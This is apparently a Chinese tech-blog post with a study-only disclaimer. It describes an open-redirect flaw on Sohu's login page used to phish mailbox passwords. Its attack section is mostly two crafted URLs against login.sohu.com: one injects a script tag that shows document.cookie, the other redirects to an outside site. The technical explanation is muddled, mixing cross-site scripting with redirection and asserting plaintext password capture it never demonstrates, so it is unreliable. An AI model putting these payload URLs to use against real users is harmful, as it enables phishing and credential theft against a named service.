作为网站的作者,我首先要声明的是,本人强烈反对任何形式的网络攻击行为,严禁利用所得到的知识进行非法活动。以下是相关知识的介绍,仅作学习和研究使用。
- 什么是URL跳转漏洞
URL跳转漏洞(也称为Open Redirect漏洞),指的是攻击者可以通过在URL中注入恶意的链接,将用户重定向到一个不安全的网站。当用户点击这个链接并进行访问后,攻击者就可以获得用户的敏感信息。
- Sohu网站URL跳转漏洞的利用
Sohu网站是中国著名的门户网站之一。在SoHu的登录界面中,用户的登录信息是通过POST方式进行提交的,表单的action属性中存在一个可以被利用的页面redirect.jsp。攻击者可以通过构造特定的URL及参数,欺骗用户登录系统并获取用户的密码。
攻击者的构造方式可以参考以下两个示例:
示例1:
http://login.sohu.com/login/callback/jump.jsp?
appid=153003&
scp=ppc&
ereturn=http%3A%2F%2Fmail.sohu.com&
fl=1&
s=834b6956de91f4364be30f7fda8f611f&
hps=1&
v=5&
errtype=1&
userid=%3Cscript%3Ealert(document.cookie)%3C/script%3E&
passwd=123456&
autologin=0&
pwdtype=0&
vr=1&
vr_lable=&
mids=&
gp=1396374433174&
ru=http%3A%2F%2Flogin.sohu.com%2Fs%3Fappid%3D11635006%26pag%3D37%26v%3D26%26ct%3D1396374433174%26rurl%3Dhttp%3A%2F%2Fmail.sohu.com%2F%253Fspm%253D0.0.1.14.wywZzl%255Fnav.105.1396374494948myTDKkHA.1%26auth%3D7dc7371ba283fa61dede68d1b6e9b3f5%26user%3D%26ts%3D%26sig%3D1bc8f87000009cda%26hpg%3D1%26fl%3D1%26pg%3D37
在URL的userid参数中,注入的是一个script标签,当用户点击链接后,就会弹出包含用户cookie信息的弹窗。通过抓包工具可以发现,用户的密码已经以明文形式提交给了攻击者。
示例2:
http://login.sohu.com/login/callback/jump.jsp?appid=153003&scp=ppc&ereturn=http%3A%2F%2Fmail.sohu.com&fl=1&s=334ccd3140976cbe8227871aeff1b4b1&hps=1&v=5&errtype=1&userid=&passwd=&autologin=0&pwdtype=0&vr=1&vr_lable=&mids=&gp=1396373948183&ru=http%3A%2F%2Flogin.sohu.com%2Fs%3Fappid%3D11635006%26pag%3D37%26v%3D26%26ct%3D1396373948189%26rurl%3D&redir=http://www.baidu.com
在URL的redir参数中,注入的是一个指向百度首页的链接。此时,当用户点击链接后,就会跳转到百度首页。攻击者可以利用这个漏洞,将用户的敏感信息提交到自己的服务器上,进一步进行恶意操作。
作为网站的作者,我建议大家一定要保护好自己的账号密码,并不要轻易点击邮件中的链接,特别是来自不明来源的链接。另外,我也建议网站的运营人员、程序员等相关人员一定要对网站进行严格的漏洞检查和修复,保障用户的安全。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:利用sohu网站URL跳转漏洞欺骗邮箱密码 - Python技术站